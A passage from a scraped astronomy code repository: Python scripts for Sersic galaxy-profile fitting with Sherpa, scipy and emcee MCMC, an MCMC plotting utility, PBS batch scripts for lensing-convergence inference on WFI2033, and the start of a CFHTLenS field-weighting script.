artificially low chi^2\nimg = noise - originalsky\n
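# note: drawing Poisson counts from (img + sky) and then subtracting the sky approximates sky-subtracted shot noise; the resulting pixel values are integers (also flagged in the to-do list at the end of this script)\n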
fits.PrimaryHDU(img)\nhdu.writeto('new_convnoise.fits',clobber=True)\nimport sherpa.astro.ui as ui\nui.load_data('new_convnoise.fits')\nui.load_psf(\"psf\",\"new_psfsherpa.fits\")\nui.set_psf(psf)\nui.set_source(ui.const2d.c + ui.sersic2d.g)\nc.c0 = 5\ng.xpos=45\ng.ypos=55\ng.ellip = .4\ng.theta=-1.5\ng.n = 1.5\ng.n.max=4\ng.ampl=90.\nui.thaw(g)\nui.thaw(c.c0)\nui.set_method(\"neldermead\")\nui.set_method_opt(\"iquad\",0)\nui.set_method_opt(\"finalsimplex\",0)\nui.fit()\n#ui.conf()\nsherpamodel = ui.get_model_image().y\nhdu = fits.PrimaryHDU(img - sherpamodel)\nhdu.writeto('new_residualsconvsherpa.fits',clobber=True)\n\n# optimize in scipy by minimizing the chi^2 on the grid, including the convolution\nstart_timeoptimize = time.time()\nimg = convolve(Sersic2D(amplitude = 100, r_eff = 10, n=1, x_0=50, y_0=50, ellip=.5, theta=-1)(x,y), gauss(x_,y_), normalize_kernel=True)\nnoise = np.random.poisson(img + originalsky)\nimg = noise - originalsky\nhdu = fits.PrimaryHDU(noise - originalsky)\nhdu.writeto('new_convnoise.fits',clobber=True)\ndef chi2(arg):\n amplitude,r_eff,n,x_0,y_0,ellip,theta = arg\n sersmodel = Sersic2D(amplitude, r_eff, n, x_0, y_0, ellip, theta)\n model = convolve(sersmodel(x,y), gauss(x_,y_), normalize_kernel=True)\n return np.sum((img - model)**2/noise_forsigma**2)\nfrom scipy.optimize import minimize\nprint \"Optimizing...\"\n#optimal = minimize(chi2, [90, 8, 1.5, 45, 55, .3, -1.2],method='Powell')\noptimal = minimize(chi2, [90, 8, 1.5, 45, 55, .3, -1.2],method='Nelder-Mead',options={'maxiter': 2000})\nhdu = fits.PrimaryHDU(img - convolve(Sersic2D(optimal.x[0],optimal.x[1],optimal.x[2],optimal.x[3],optimal.x[4],optimal.x[5],optimal.x[6])(x,y), gauss(x_,y_), normalize_kernel=True))\nhdu.writeto('new_residualsconv.fits',clobber=True)\nprint optimal\nprint \"Chi^2/nu\",np.sum((img - convolve(Sersic2D(optimal.x[0],optimal.x[1],optimal.x[2],optimal.x[3],optimal.x[4],optimal.x[5],optimal.x[6])(x,y), gauss(x_,y_), normalize_kernel=True) + originalsky)**2/noise_forsigma**2)/(pixels**2 - 7), \"nu =\", pixels**2 - 7\n # !!!!!!!!!!!!! 
# emcee\n\nimport emcee\ntheta_true = (100, 10, 1, 50, 50, .5, -1)\n# priors I use:\n# amplitude [0,1000]\n# r_eff > 0; Gauss(10,10)\n# n (0.5,10]; Gauss(2,0.5)\n# x_0 Gauss(50,2)\n# y_0 Gauss(50,2)\n# ellip [0.2,1); Gauss(0.5,0.15)\n# theta Gauss(-1,0.2)\ndef log_prior(arg):\n    amplitude, r_eff, n, x_0, y_0, ellip, theta = arg\n    if amplitude < 0 or amplitude > 1000 or r_eff <= 0 or n <= 0.5 or n > 10 or ellip < 0.2 or ellip >= 1:\n        return -np.inf # log(0)\n    return -0.5 * ((r_eff - 10)**2)/(10**2) -0.5 * ((n - 2)**2)/(0.5**2) -0.5 * ((x_0 - 50)**2)/(2**2) -0.5 * ((y_0 - 50)**2)/(2**2) -0.5 * ((ellip - 0.5)**2)/(0.15**2) -0.5 * ((theta + 1)**2)/(0.2**2)\ndef log_like(arg):\n    amplitude, r_eff, n, x_0, y_0, ellip, theta = arg\n    return -0.5 * chi2(arg)\ndef log_posterior(arg):\n    if not np.isfinite(log_prior(arg)):\n        return -np.inf\n    return log_prior(arg) + log_like(arg)\nndim = 7 # number of parameters in the model\nnwalkers = 20 # number of MCMC walkers\nnsteps = 2000 # number of MCMC steps to take including burn-in\n# initial guesses in a small ball around the best-fit\nstarting_guesses = np.c_[abs(np.random.normal(optimal.x[0],10,nwalkers)),abs(np.random.normal(optimal.x[1],2,nwalkers)),abs(np.random.normal(optimal.x[2],0.1,nwalkers)),abs(np.random.normal(optimal.x[3],2,nwalkers)),abs(np.random.normal(optimal.x[4],2,nwalkers)),abs(np.random.normal(optimal.x[5],0.1,nwalkers)),np.random.normal(optimal.x[6],0.1,nwalkers)] # use this in case I want to run emcee instead of parallel tempering\n\nprint(\"Running MCMC...\")\n#start_timeemcee1 = time.time()\n#sampler = emcee.EnsembleSampler(nwalkers,ndim,log_posterior)\n# run while showing the progress\n#for i, result in enumerate(sampler.sample(starting_guesses,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n    #if (i+1) % 100 == 0:\n        #print(\"{0:5.1%}\".format(float(i) / nsteps))\n#print(\"Time for emcee with 1 thread: --- %s seconds ---\" % (time.time() - start_timeemcee1))\n\nstart_timeemcee8 = time.time()\nsampler = emcee.EnsembleSampler(nwalkers,ndim,log_posterior,threads = 7)\n# run while showing the progress\nfor i, result in enumerate(sampler.sample(starting_guesses,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n    if (i+1) % 100 == 0:\n        print(\"{0:5.1%}\".format(float(i) / nsteps))\nprint(\"Time for emcee with 7 threads: --- %s seconds ---\" % (time.time() - start_timeemcee8))\n\n
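# note: the trace plots below are a quick convergence check; after discarding the burn-in (nburn, set further down) the chains should look stationary around the true values marked by the horizontal lines\n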
# plot the time lapse\nimport corner\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\nplt.clf()\nfig, axes = plt.subplots(7, 1, sharex=True, figsize=(8, 9))\naxes[0].plot(sampler.chain[:, :, 0].T, color=\"k\", alpha=0.4)\naxes[0].yaxis.set_major_locator(MaxNLocator(5))\naxes[0].axhline(theta_true[0], color=\"#888888\", lw=2)\naxes[0].set_ylabel(\"amplitude\")\naxes[1].plot(sampler.chain[:, :, 1].T, color=\"k\", alpha=0.4)\naxes[1].yaxis.set_major_locator(MaxNLocator(5))\naxes[1].axhline(theta_true[1], color=\"#888888\", lw=2)\naxes[1].set_ylabel(\"r_eff\")\naxes[2].plot(sampler.chain[:, :, 2].T, color=\"k\", alpha=0.4)\naxes[2].yaxis.set_major_locator(MaxNLocator(5))\naxes[2].axhline(theta_true[2], color=\"#888888\", lw=2)\naxes[2].set_ylabel(\"n\")\naxes[3].plot(sampler.chain[:, :, 3].T, color=\"k\", alpha=0.4)\naxes[3].yaxis.set_major_locator(MaxNLocator(5))\naxes[3].axhline(theta_true[3], color=\"#888888\", lw=2)\naxes[3].set_ylabel(\"x_0\")\naxes[4].plot(sampler.chain[:, :, 4].T, color=\"k\", alpha=0.4)\naxes[4].yaxis.set_major_locator(MaxNLocator(5))\naxes[4].axhline(theta_true[4], color=\"#888888\", lw=2)\naxes[4].set_ylabel(\"y_0\")\naxes[5].plot(sampler.chain[:, :, 5].T, color=\"k\", alpha=0.4)\naxes[5].yaxis.set_major_locator(MaxNLocator(5))\naxes[5].axhline(theta_true[5], color=\"#888888\", lw=2)\naxes[5].set_ylabel(\"ellip\")\naxes[6].plot(sampler.chain[:, :, 6].T, color=\"k\", alpha=0.4)\naxes[6].yaxis.set_major_locator(MaxNLocator(5))\naxes[6].axhline(theta_true[6], color=\"#888888\", lw=2)\naxes[6].set_ylabel(\"theta\")\naxes[6].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\nfig.show()\n\n# print diagnostics and do corner plot\nnburn = 1000 # \"burn-in\" to stabilize chains\nsamples = sampler.chain[:, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\n#alpha_samp = sampler.flatchain.T[0]\n#beta_samp = sampler.flatchain.T[1]\n#sigma_samp = sampler.flatchain.T[2]\n#print(\"Autocorrelation time:\", sampler.get_autocorr_time())\nprint \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nprint \"median, std 1: \", np.median(samples[:,0]), np.std(samples[:,0])\nprint \"median, std 2: \", np.median(samples[:,1]), np.std(samples[:,1])\nprint \"median, std 3: \", np.median(samples[:,2]), np.std(samples[:,2])\nprint \"median, std 4: \", np.median(samples[:,3]), np.std(samples[:,3])\nprint \"median, std 5: \", np.median(samples[:,4]), np.std(samples[:,4])\nprint \"median, std 6: \", np.median(samples[:,5]), np.std(samples[:,5])\nprint \"median, std 7: \", np.median(samples[:,6]), np.std(samples[:,6])\nfig = corner.corner(samples, labels=[\"amplitude\", \"r_eff\", \"n\", \"x_0\", \"y_0\", \"ellip\", \"theta\"],truths=[theta_true[0],theta_true[1],theta_true[2],theta_true[3],theta_true[4],theta_true[5],theta_true[6]])\nfig.show()\n\n
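# note: parallel tempering runs coupled samplers at several temperatures, which helps with multimodal posteriors and also yields the evidence via thermodynamic integration, printed below\n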
# parallel tempering; takes longer to run because it runs emcee for each temperature\nstart_timept = time.time()\nntemps = 5\nstarting_guesses = np.zeros((ntemps,nwalkers,ndim))\nfor i in range(ntemps):\n    starting_guesses[i] = np.c_[abs(np.random.normal(optimal.x[0],10,nwalkers)),abs(np.random.normal(optimal.x[1],2,nwalkers)),abs(np.random.normal(optimal.x[2],0.1,nwalkers)),abs(np.random.normal(optimal.x[3],2,nwalkers)),abs(np.random.normal(optimal.x[4],2,nwalkers)),abs(np.random.normal(optimal.x[5],0.1,nwalkers)),np.random.normal(optimal.x[6],0.1,nwalkers)]\nfrom emcee import PTSampler\nsampler = PTSampler(ntemps,nwalkers,ndim,log_like,log_prior,threads = 7)\nprint(\"Running MCMC...\")\nfor i, result in enumerate(sampler.sample(starting_guesses,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n    if (i+1) % 100 == 0:\n        print(\"{0:5.1%}\".format(float(i) / nsteps))\nprint(\"Time for PT with 7 threads: --- %s seconds ---\" % (time.time() - start_timept))\nprint \"Evidence: \", sampler.thermodynamic_integration_log_evidence()\n# plot the time lapse\nplt.clf()\nfig, axes = plt.subplots(7, 1, sharex=True, figsize=(8, 9))\naxes[0].plot(sampler.chain[:, :, :, 0].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[0].yaxis.set_major_locator(MaxNLocator(5))\naxes[0].axhline(theta_true[0], color=\"#888888\", lw=2)\naxes[0].set_ylabel(\"amplitude\")\naxes[1].plot(sampler.chain[:, :, :, 1].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[1].yaxis.set_major_locator(MaxNLocator(5))\naxes[1].axhline(theta_true[1], color=\"#888888\", lw=2)\naxes[1].set_ylabel(\"r_eff\")\naxes[2].plot(sampler.chain[:, :, :, 2].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[2].yaxis.set_major_locator(MaxNLocator(5))\naxes[2].axhline(theta_true[2], color=\"#888888\", lw=2)\naxes[2].set_ylabel(\"n\")\naxes[3].plot(sampler.chain[:, :, :, 3].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[3].yaxis.set_major_locator(MaxNLocator(5))\naxes[3].axhline(theta_true[3], color=\"#888888\", lw=2)\naxes[3].set_ylabel(\"x_0\")\naxes[4].plot(sampler.chain[:, :, :, 4].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[4].yaxis.set_major_locator(MaxNLocator(5))\naxes[4].axhline(theta_true[4], color=\"#888888\", lw=2)\naxes[4].set_ylabel(\"y_0\")\naxes[5].plot(sampler.chain[:, :, :, 5].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[5].yaxis.set_major_locator(MaxNLocator(5))\naxes[5].axhline(theta_true[5], color=\"#888888\", lw=2)\naxes[5].set_ylabel(\"ellip\")\naxes[6].plot(sampler.chain[:, :, :, 6].T.reshape((nwalkers*ntemps, nsteps)), color=\"k\", alpha=0.4)\naxes[6].yaxis.set_major_locator(MaxNLocator(5))\naxes[6].axhline(theta_true[6], color=\"#888888\", lw=2)\naxes[6].set_ylabel(\"theta\")\naxes[6].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\nfig.show()\nplt.clf()\nsamples = sampler.chain[:, :, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\nfig = corner.corner(samples, labels=[\"amplitude\", \"r_eff\", \"n\", \"x_0\", \"y_0\", \"ellip\", \"theta\"],truths=[theta_true[0],theta_true[1],theta_true[2],theta_true[3],theta_true[4],theta_true[5],theta_true[6]])\nfig.show()\nemcee.autocorr.integrated_time(samples,axis=0)\nemcee.autocorr.function(samples,axis=0)\n\n#Time for scipy optimization: --- 52.5281159878 seconds ---\n#Time for emcee with 1 thread: --- 323.612744093 seconds ---\n#Time for emcee with 4 threads: --- 132.817188978 seconds ---\n#Time for emcee with 7 threads: --- 118.459464073 seconds ---\n#Time for PT with 7 threads: --- 452.805958033 seconds ---\n\n# FUTURE WORK\n'''\n1) save progress, run on multiple computers\n2) PT and emcee give different distributions even after setting more stringent prior on ellipticity\n3) why does it say AutocorrError: The chain is too short to reliably estimate the autocorrelation time ?\n4) careful because right now all images with noise have integer pixel values\n5) convolution central pixels: http://docs.astropy.org/en/stable/api/astropy.convolution.discretize_model.html#astropy.convolution.discretize_model oversample for sub-pixel; pyprofit seems the better option\n6) make physical units: exptime, gain, scale, mag\n7) lens it\n8) mask central pixels\n'''\n" }, { "alpha_fraction": 0.6802763938903809, "alphanum_fraction": 0.7072864174842834, "avg_line_length": 33.60869598388672, "blob_id": "5d64773e15cb6326ac244a4b347c0b56c688d3bb", "content_id": "e83e7aa7aee8f773b133e4395294a3e42a6cc5e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1592, "license_type": "no_license", "max_line_length": 100, "num_lines": 46, "path": "/python/plot_utilities/mcmcplots.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Creates both time lapse and corner plots for MCMC output files in the format of glafic and hostlens\n# Use as python mcmcplots.py filename\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\nfiletime = file[:-4] + \"_timelapse.png\"\nfilecorner = file[:-4] + \"_cornerplot.png\"\n\nburnin = 10 # in percent, to eliminate from the head\ndata = np.loadtxt(file,unpack=True)\ndata = data[0:len(data),int(burnin/100.0*len(data[0])):len(data[0])]\n\nimport corner\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\n\n# plot timelapse\nplt.clf()\nfig, axes = plt.subplots(len(data), 1, sharex=True, figsize=(20, 20))\nfor i in range(len(data)):\n    axes[i].plot(data[i], color=\"k\", alpha=0.4)\n    axes[i].yaxis.set_major_locator(MaxNLocator(5))\n    #axes[0].axhline(chimin_z, color=\"#888888\", lw=2)\n    axes[i].set_ylabel(str(i))\naxes[i].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\n#fig.show()\nfig.savefig(filetime, dpi=150)\n\n# corner plot\n#nburn = nsteps/2 # \"burn-in\" to stabilize chains\n#samples = sampler.chain[:, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\n#alpha_samp = sampler.flatchain.T[0]\n#beta_samp = sampler.flatchain.T[1]\n#sigma_samp = sampler.flatchain.T[2]\n#print(\"Autocorrelation time:\", sampler.get_autocorr_time())\n#print \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nlabels = np.linspace(0,len(data)-1,len(data)).astype(int).astype(str)\nmeds = np.zeros(len(data))\nfor i in range(len(data)):\n    meds[i] = np.median(data[i])\nfig = corner.corner(data.T, labels=labels,truths=meds)\n#fig.show()\nfig.savefig(filecorner, dpi=150)\n" }, { "alpha_fraction": 0.6651685237884521, "alphanum_fraction": 0.7640449404716492, "avg_line_length": 24.72222137451172, "blob_id": "86404e70bd846169fb6652f28d95821f9e8834af", "content_id": "41175c07ce45b383066d33aa8ac155ca977bdba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 445, "license_type": "no_license", "max_line_length": 101, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer12.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log12.out\n#PBS -e Log12.err\n#PBS -N 12\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython 
inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal gamma oneoverr mass2rms\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr mass2rms\n" }, { "alpha_fraction": 0.6626794338226318, "alphanum_fraction": 0.7535884976387024, "avg_line_length": 22.22222137451172, "blob_id": "79e4882121dd6dc62e221d777191fb40b3974610", "content_id": "8a3b66cb84e837ed150227fb4938720407aa466f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 418, "license_type": "no_license", "max_line_length": 93, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer35.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log35.out\n#PBS -e Log35.err\n#PBS -N 35\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal oneoverr SIShalo\npython inferkappa_unbiasedwithshear.py WFI2033 5 120 23 meds gal oneoverr SIShalo\n" }, { "alpha_fraction": 0.6802763938903809, "alphanum_fraction": 0.7072864174842834, "avg_line_length": 33.60869598388672, "blob_id": "5d64773e15cb6326ac244a4b347c0b56c688d3bb", "content_id": "e83e7aa7aee8f773b133e4395294a3e42a6cc5e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1592, "license_type": "no_license", "max_line_length": 100, "num_lines": 46, "path": "/python/plot_utilities/mcmcplots.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Creates both time laps and corner plots for MCMC output files in the format of glafic and hostlens\n# Use as python mcmcplots.py filename\n\nimport numpy as np\nimport sys\n\nfile = str(sys.argv[1])\nfiletime = file[:-4] + \"_timelapse.png\"\nfilecorner = file[:-4] + \"_cornerplot.png\"\n\nburnin = 10 # in percent, to eliminate from the head\ndata = np.loadtxt(file,unpack=True)\ndata = data[0:len(data),int(burnin/100.0*len(data[0])):len(data[0])]\n\nimport corner\nimport pylab as plt\nfrom matplotlib.ticker import MaxNLocator\n\n# plot timelapse\nplt.clf()\nfig, axes = plt.subplots(len(data), 1, sharex=True, figsize=(20, 20))\nfor i in range(len(data)):\n axes[i].plot(data[i], color=\"k\", alpha=0.4)\n axes[i].yaxis.set_major_locator(MaxNLocator(5))\n #axes[0].axhline(chimin_z, color=\"#888888\", lw=2)\n axes[i].set_ylabel(str(i))\naxes[i].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\n#fig.show()\nfig.savefig(filetime, dpi=150)\n\n# corner plot\n#nburn = nsteps/2 # \"burn-in\" to stabilize chains\n#samples = sampler.chain[:, nburn:, :].reshape((-1, ndim)) # combines all walkers, without burn-in\n#alpha_samp = sampler.flatchain.T[0]\n#beta_samp = sampler.flatchain.T[1]\n#sigma_samp = sampler.flatchain.T[2]\n#print(\"Autocorrelation time:\", sampler.get_autocorr_time())\n#print \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nlabels = np.linspace(0,len(data)-1,len(data)).astype(int).astype(str)\nmeds = np.zeros(len(data))\nfor i in range(len(data)):\n meds[i] = np.median(data[i])\nfig = corner.corner(data.T, labels=labels,truths=meds)\n#fig.show()\nfig.savefig(filecorner, dpi=150)\n" }, { "alpha_fraction": 0.6496945023536682, "alphanum_fraction": 0.7576375007629395, "avg_line_length": 23.549999237060547, "blob_id": "eb1ee2b4a00d0c682488516742719b63dc3138c0", "content_id": 
"655d6673b77287198badf176c8d563f036d424f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 491, "license_type": "no_license", "max_line_length": 63, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim36.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log36s.out\n#PBS -e Log36s.err\n#PBS -N 36s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma\n" }, { "alpha_fraction": 0.5048640370368958, "alphanum_fraction": 0.534527063369751, "avg_line_length": 93.69808959960938, "blob_id": "4090365f5a30922433264f3628fdd66638f11937", "content_id": "9ff48d7c6fa0e071352eaddca3aa12216133c497", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79358, "license_type": "no_license", "max_line_length": 716, "num_lines": 838, "path": "/python/weightinguniversal.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# run as: python weightinguniversal.py lens fields#.lst masks#.lst samplesize# msk_lenssize maglimit classification mode\n# where lens is B1608,HE0435,HE1104 or RX1131, samplesize number is 0, 100 or 1000 and msk_lenssize is 45, 60, 90 or 120; maglimit is 23 23.5 or 24; classification is \"old\" or \"new\", where \"old\" means original CFHTLENS, and \"new\" means extended beyond i=23;\n\nimport numpy as np\nimport scipy\nimport sys\nfrom scipy import special\nfrom scipy import stats\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\n\n# Open the list of fields and associated masks; open the final HE_lens mask, with correct header; open the catalogue, define coordinates and redshift\n\nstart_timefield = time.time()\n\nwith open(sys.argv[2]) as f: # fields#.lst\n listfields = f.readlines()\n\nwith open(sys.argv[3]) as f: # masks#.lst\n listmasks = f.readlines()\n\nprint(\"Arguments: \\n Lens field: %s \\n List of fields to work on: %s \\n List of masks associated with the fields: %s \\n Number of samples to be drawn from P(z) and P(Mstar): %s \\n Radius of each cell: %s \\n Limiting magnitude: %s \\n Classification: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5]), float(str(sys.argv[6])), str(sys.argv[7])))\n\nmsk_lens = fits.open('msk%s_asecrad%s.fits' % (str(sys.argv[1]),str(sys.argv[5])))\nmaskedlens = np.where( msk_lens[0].data == 0 ) # will be used later in computing the mask cover fraction\n#print maskedlens[0]\n#print maskedlens[1]\ncat_lens = Table.read('%s.cat' % (str(sys.argv[1])), names=('ID', 'X', 'Y', 'ra','dec','mag','z','z_inf','z_sup','mass_best','mass_inf','mass_med','mass_sup', 'specz?', 'correction'), format='ascii')\npdzcat_lens = np.loadtxt('%s_pdz.cat' % str(sys.argv[1])) # since the catalogue is small, I just load it into memory\nmstarcat_lens = 
np.loadtxt('%s_mstar.cat' % str(sys.argv[1])) # since the catalogue is small, I just load it into memory\nzgrid=np.linspace(0.05,3.5,70)\nzgridint = np.arange(70) # because stats.rv_discrete only works with integer points\nif str(sys.argv[7])==\"old\":\n cat_lens_reclassif=cat_lens\nelse:\n cat_lens_reclassif=Table(names=('ID','X','Y','ra','dec','mag','z','z_inf','z_sup','mass_best','mass_inf','mass_med','mass_sup','specz?','correction'),dtype=('<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8'))\n for i in range(len(cat_lens)):\n if cat_lens['mag'][i]<=23:\n cat_lens_reclassif.add_row(cat_lens[i])\n else:\n if cat_lens['specz?'][i]==1:\n cat_lens_reclassif.add_row(cat_lens[i])\n elif mstarcat_lens[mstarcat_lens[:,0]==cat_lens['ID'][i]][0][5]/mstarcat_lens[mstarcat_lens[:,0]==cat_lens['ID'][i]][0][6]<0.5:\n cat_lens_reclassif.add_row(cat_lens[i])\n#print cat_lens_reclassif['ID']\ndist_lens = Column(np.arange(len(cat_lens_reclassif)), name='dist', dtype=('<f8')) # this is done in order to implement the 1/r weight convention for < 10 arcsec and also in order to use the mask of appropriate radius\ncat_lens_reclassif.add_column(dist_lens)\nif str(sys.argv[1]) == \"B1608\":\n center_lens = SkyCoord('16:09:13.956 +65:32:28.00', frame='fk5', unit=(u.hourangle, u.deg))\nif str(sys.argv[1]) == \"HE0435\":\n center_lens = SkyCoord('04:38:14.871 -12:17:14.96', frame='fk5', unit=(u.hourangle, u.deg))\nif str(sys.argv[1]) == \"HE1104\":\n center_lens = SkyCoord('11:06:33.450 -18:21:24.20', frame='fk5', unit=(u.hourangle, u.deg))\nif str(sys.argv[1]) == \"RX1131\":\n center_lens = SkyCoord('11:31:51.435 -12:31:58.24', frame='fk5', unit=(u.hourangle, u.deg))\n\ncoord_lens=SkyCoord(ra=cat_lens_reclassif['ra']*u.degree, dec=cat_lens_reclassif['dec']*u.degree, frame='fk5')\ncat_lens_reclassif['dist'] = coord_lens.separation(center_lens).arcsec\nfor i in range(len(cat_lens_reclassif)):\n if cat_lens_reclassif['dist'][i] < 10:\n cat_lens_reclassif['dist'][i] = 10\n\nif str(sys.argv[1]) == \"B1608\":\n z_s_lens = 1.39\nif str(sys.argv[1]) == \"HE0435\":\n z_s_lens = 1.69\nif str(sys.argv[1]) == \"HE1104\":\n z_s_lens = 2.32\nif str(sys.argv[1]) == \"RX1131\":\n z_s_lens = 0.66\npixlens = 0.200 * u.arcsec\n\n# Open the subfield mask and catalogue, and set up the cell grid\n\npixCFHT = 0.187 * u.arcsec\n\nfor count in range(len(listfields)):\n #if \"W1m\" in [x[0:len(listmasks[0])] for x in listmasks][count]:\n \n start_timesubfield = time.time()\n msk = fits.open('%s' % [a[0:len(listmasks[0])-1] for a in listmasks][count])\n cells_on_a_side = int((len(msk[0].data[1]) * pixCFHT) / (1200 * pixlens))\n #print (\"Reading catalogue %s.cat ...\" %[x[0:len(listfields[0])-1] for x in listfields][count])\n #start_time = time.time()\n #catfield = Table.read('%s.cat' % [x[0:len(listfields[0])-1] for x in listfields][count], format='ascii')\n #print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n# Define the center of each cell as a matrix of SkyCoord and test which cells to discard because of large masked area (I ignore the area covered in the lens)\n# Mask the lens catalogue using the field mask of each cell\n\n worldfield = WCS('%s' % [b[0:len(listmasks[0])-1] for b in listmasks][count])\n coordorigin = SkyCoord(ra=worldfield.wcs_pix2world(0,0,0)[0]*u.degree, dec=worldfield.wcs_pix2world(0,0,0)[1]*u.degree, frame='fk5')\n centerfields = [ [SkyCoord('00:0:0.0 0:0:0.0', frame='fk5', unit=(u.hourangle, u.deg))]*cells_on_a_side for i in range(cells_on_a_side) ] # 
matrix of SkyCoord\n    maskedcell = np.zeros((cells_on_a_side,cells_on_a_side))\n    origtry = np.zeros((cells_on_a_side,cells_on_a_side))\n    origtry1 = np.zeros((cells_on_a_side,cells_on_a_side))\n    catupdate_lens = [[ [Table(names=('ID','X','Y','ra','dec','mag','z','z_inf','z_sup','mass_best','mass_inf','mass_med','mass_sup','specz?','correction','dist'),dtype=('<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8', '<f8'))]*cells_on_a_side for i in range(cells_on_a_side) ] for j in range(cells_on_a_side)] # matrix of tables; this is three-dimensional because if I create a two-dimensional array it will append to all columns\n    print \"Masking the lens catalogue...\"\n    start_time = time.time()\n    for i in range(cells_on_a_side):\n        for j in range(cells_on_a_side):\n            xlow = (240.0 * u.arcsec / pixCFHT) * i\n            xhigh = (240.0 * u.arcsec / pixCFHT) + (240.0 * u.arcsec / pixCFHT) * i\n            ylow = (240.0 * u.arcsec / pixCFHT) * j\n            yhigh = (240.0 * u.arcsec / pixCFHT) + (240.0 * u.arcsec / pixCFHT) * j\n            centerfields[i][j] = SkyCoord(ra=worldfield.wcs_pix2world(xlow + (xhigh-xlow)/2, ylow + (yhigh-ylow)/2, 0)[0]*u.degree, dec=worldfield.wcs_pix2world(xlow + (xhigh-xlow)/2, ylow + (yhigh-ylow)/2,0)[1]*u.degree, frame='fk5')\n            maskedfieldx = float(xlow)+(maskedlens[0]/1200.0)*(float(xhigh)-float(xlow))\n            maskedfieldy = float(ylow)+(maskedlens[1]/1200.0)*(float(yhigh)-float(ylow))\n            # the pixels in the field mask that correspond to the unmasked pixels in the lens mask\n            maskedfield = msk[0].data[maskedfieldy.astype(int),maskedfieldx.astype(int)]\n            maskedcell[i][j] = maskedfield[maskedfield == 0].size / (np.pi*((int((str(sys.argv[5])))*u.arcsec/pixlens)**2))\n            #print i,j\n            for k in range(len(cat_lens_reclassif)):\n                if (msk_lens[0].data[cat_lens_reclassif['Y'][k],cat_lens_reclassif['X'][k]] == 0) and (cat_lens_reclassif['z'][k] <= z_s_lens) and (cat_lens_reclassif['mag'][k] <= float(str(sys.argv[6]))) and (msk[0].data[(ylow + cat_lens_reclassif['Y'][k] * pixlens / pixCFHT).value, (xlow + 